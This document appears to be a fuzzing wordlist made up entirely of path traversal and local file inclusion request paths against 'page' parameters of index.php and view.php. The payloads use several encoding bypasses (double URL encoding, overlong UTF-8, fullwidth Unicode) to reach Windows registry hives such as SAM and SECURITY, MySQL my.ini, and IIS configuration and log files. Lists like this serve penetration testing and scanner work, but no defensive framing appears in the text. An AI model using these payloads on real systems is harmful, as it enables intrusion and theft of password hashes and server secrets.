/index.php?page=%uff0e%uff0e%u2215C:/Windows/system32/config/security.sav 
/index.php?page=%uff0e%uff0e%u2216C:/Windows/system32/config/security.sav 
/index.php?page=../../../../../C:/Windows/system32/config/software.sav 
/view.php?page=../../../../../C:/Windows/system32/config/software.sav 
/index.php?page=%2e%2e%2fC:/Windows/system32/config/software.sav 
/index.php?page=%252e%252e%252fC:/Windows/system32/config/software.sav 
/index.php?page=%c0%ae%c0%ae%c0%afC:/Windows/system32/config/software.sav 
/index.php?page=%uff0e%uff0e%u2215C:/Windows/system32/config/software.sav 
/index.php?page=%uff0e%uff0e%u2216C:/Windows/system32/config/software.sav 
/index.php?page=../../../../../C:/Windows/system32/config/system.sav 
/view.php?page=../../../../../C:/Windows/system32/config/system.sav 
/index.php?page=%2e%2e%2fC:/Windows/system32/config/system.sav 
/index.php?page=%252e%252e%252fC:/Windows/system32/config/system.sav 
/index.php?page=%c0%ae%c0%ae%c0%afC:/Windows/system32/config/system.sav 
/index.php?page=%uff0e%uff0e%u2215C:/Windows/system32/config/system.sav 
/index.php?page=%uff0e%uff0e%u2216C:/Windows/system32/config/system.sav 
/index.php?page=../../../../../C:/Windows/system32/config/regback/default 
/view.php?page=../../../../../C:/Windows/system32/config/regback/default 
/index.php?page=%2e%2e%2fC:/Windows/system32/config/regback/default 
/index.php?page=%252e%252e%252fC:/Windows/system32/config/regback/default 
/index.php?page=%c0%ae%c0%ae%c0%afC:/Windows/system32/config/regback/default 
/index.php?page=%uff0e%uff0e%u2215C:/Windows/system32/config/regback/default 
/index.php?page=%uff0e%uff0e%u2216C:/Windows/system32/config/regback/default 
/index.php?page=../../../../../C:/Windows/system32/config/regback/sam 
/view.php?page=../../../../../C:/Windows/system32/config/regback/sam 
/index.php?page=%2e%2e%2fC:/Windows/system32/config/regback/sam 
/index.php?page=%252e%252e%252fC:/Windows/system32/config/regback/sam 
/index.php?page=%c0%ae%c0%ae%c0%afC:/Windows/system32/config/regback/sam 
/index.php?page=%uff0e%uff0e%u2215C:/Windows/system32/config/regback/sam 
/index.php?page=%uff0e%uff0e%u2216C:/Windows/system32/config/regback/sam 
/index.php?page=../../../../../C:/Windows/system32/config/regback/security 
/view.php?page=../../../../../C:/Windows/system32/config/regback/security 
/index.php?page=%2e%2e%2fC:/Windows/system32/config/regback/security 
/index.php?page=%252e%252e%252fC:/Windows/system32/config/regback/security 
/index.php?page=%c0%ae%c0%ae%c0%afC:/Windows/system32/config/regback/security 
/index.php?page=%uff0e%uff0e%u2215C:/Windows/system32/config/regback/security 
/index.php?page=%uff0e%uff0e%u2216C:/Windows/system32/config/regback/security 
/index.php?page=../../../../../C:/Windows/system32/config/regback/system 
/view.php?page=../../../../../C:/Windows/system32/config/regback/system 
/index.php?page=%2e%2e%2fC:/Windows/system32/config/regback/system 
/index.php?page=%252e%252e%252fC:/Windows/system32/config/regback/system 
/index.php?page=%c0%ae%c0%ae%c0%afC:/Windows/system32/config/regback/system 
/index.php?page=%uff0e%uff0e%u2215C:/Windows/system32/config/regback/system 
/index.php?page=%uff0e%uff0e%u2216C:/Windows/system32/config/regback/system 
/index.php?page=../../../../../C:/Windows/system32/config/regback/software
/view.php?page=../../../../../C:/Windows/system32/config/regback/software
/index.php?page=%2e%2e%2fC:/Windows/system32/config/regback/software
/index.php?page=%252e%252e%252fC:/Windows/system32/config/regback/software
/index.php?page=%c0%ae%c0%ae%c0%afC:/Windows/system32/config/regback/software
/index.php?page=%uff0e%uff0e%u2215C:/Windows/system32/config/regback/software
/index.php?page=%uff0e%uff0e%u2216C:/Windows/system32/config/regback/software
/index.php?page=../../../../../C:/Program Files/MySQL/MySQL Server 5.1/my.ini 
/view.php?page=../../../../../C:/Program Files/MySQL/MySQL Server 5.1/my.ini 
/index.php?page=%2e%2e%2fC:/Program Files/MySQL/MySQL Server 5.1/my.ini 
/index.php?page=%252e%252e%252fC:/Program Files/MySQL/MySQL Server 5.1/my.ini 
/index.php?page=%c0%ae%c0%ae%c0%afC:/Program Files/MySQL/MySQL Server 5.1/my.ini 
/index.php?page=%uff0e%uff0e%u2215C:/Program Files/MySQL/MySQL Server 5.1/my.ini 
/index.php?page=%uff0e%uff0e%u2216C:/Program Files/MySQL/MySQL Server 5.1/my.ini 
/index.php?page=../../../../../C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml 
/view.php?page=../../../../../C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml 
/index.php?page=%2e%2e%2fC:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml 
/index.php?page=%252e%252e%252fC:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml 
/index.php?page=%c0%ae%c0%ae%c0%afC:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml 
/index.php?page=%uff0e%uff0e%u2215C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml 
/index.php?page=%uff0e%uff0e%u2216C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml 
/index.php?page=../../../../../C:/Windows/System32/inetsrv/config/applicationHost.config 
/view.php?page=../../../../../C:/Windows/System32/inetsrv/config/applicationHost.config 
/index.php?page=%2e%2e%2fC:/Windows/System32/inetsrv/config/applicationHost.config 
/index.php?page=%252e%252e%252fC:/Windows/System32/inetsrv/config/applicationHost.config 
/index.php?page=%c0%ae%c0%ae%c0%afC:/Windows/System32/inetsrv/config/applicationHost.config 
/index.php?page=%uff0e%uff0e%u2215C:/Windows/System32/inetsrv/config/applicationHost.config 
/index.php?page=%uff0e%uff0e%u2216C:/Windows/System32/inetsrv/config/applicationHost.config 
/index.php?page=../../../../../C:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log
/view.php?page=../../../../../C:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log
/index.php?page=%2e%2e%2fC:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log
/index.php?page=%252e%252e%252fC:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log
/index.php?page=%c0%ae%c0%ae%c0%afC:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log
/index.php?page=%uff0e%uff0e%u2215C:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log
/index.php?page=%uff0e%uff0e%u2216C:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log
/index.php?page=%2e%2e%2fC:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log
/index.php?page=%252e%252e%252fD:\Program Files\
/index.php?page=%c0%ae%c0%ae%c0%afD:\Program Files\
/index.php?page=%uff0e%uff0e%u2215D:\Program Files\
/index.php?page=%uff0e%uff0e%u2216D:\Program Files\